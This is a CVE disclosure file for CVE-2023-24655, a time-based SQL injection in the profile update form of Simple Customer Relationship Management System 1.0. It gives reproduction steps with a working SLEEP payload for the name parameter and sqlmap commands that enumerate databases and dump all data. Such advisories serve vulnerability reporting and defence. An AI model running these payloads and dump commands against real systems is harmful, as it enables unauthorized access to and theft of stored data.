CVE-2023-24655: CVE/CVE-2023-24655.txt at main · y0gesh-verma/CVE

> [Suggested description] > Simple Customer Relationship Management System v1.0 was discovered to > contain a SQL injection vulnerability via the name parameter under the > Profile Update function. > > ------------------------------------------ > > [Additional Information] > Steps-To-Reproduce: > 1. Now register a user by navigating the URL: http://localhost/php-scrm/registration.php > 2. Now login registered user with the valid credential by following the URL: http://localhost/php-scrm/login.php > 3. Now Navigate to the profile update page By following the URL: http://localhost/php-scrm/profile.php > 4. Now fill out your profile form then intercept the request in the burp suite. > 5. Now send the burp suite intercepted request into the burp repeater. > Payload: ' AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc > 6. Now insert the payload in the name parameter. > > Content-Disposition: form-data; name="name" > > user1’ AND (SELECT 123 FROM (SELECT(SLEEP(10)))abc)-- abc > > 7. Now click on the “send” button to send the request. > 8. Now you will see the response is delayed by 10 seconds and is vulnerable to SQL injection. > 9. Now dump data by using sqlmap. > 10. Now copy the burp intercepted request and create a file crm-profile-request.txt > > 11. Now dump databases by sqlmap. > # python sqlmap.py -r crm-profile-request.txt -p name -dbs --batch > 12. Now dump all data by sqlmap. > # python sqlmap.py -r crm-profile-request.txt -p name --dump-all --batch > > ------------------------------------------ > > [Vulnerability Type] > SQL Injection > > ------------------------------------------ > > [Vendor of Product] > https://www.sourcecodester.com > > ------------------------------------------ > > [Affected Product Code Base] > Simple Customer Relationship Management (CRM) System - 1.0 > > ------------------------------------------ > > [Affected Component] > http://localhost/php-scrm/profile.php > > ------------------------------------------ > > [Attack Type] > Remote > > ------------------------------------------ > > [Impact Code execution] > true > > ------------------------------------------ > > [Impact Escalation of Privileges] > true > > ------------------------------------------ > > [Impact Information Disclosure] > true > > ------------------------------------------ > > [Attack Vectors] > SQL injection is a type of cyber attack in which an attacker inserts malicious code into a website’s SQL statements in order to gain unauthorized access to sensitive information stored in a database. This type of attack can be used to steal sensitive information such as login credentials, personal information, and financial data. These attacks can have serious consequences, including: > > 1. Theft of sensitive data: An attacker can use SQL injection to access and steal confidential data from a database, such as passwords, financial information, or personal information. > 2. Modification of data: An attacker can use SQL injection to alter or delete data from a database, potentially causing incorrect results or system failures. > 3. Server compromise: In some cases, an attacker can use SQL injection to gain unauthorized access to the underlying operating system and take complete control of the server. > > ------------------------------------------ > > [Reference] > https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html > https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip > > ------------------------------------------ > > [Discoverer] > Yogesh Verma Use CVE-2023-24655.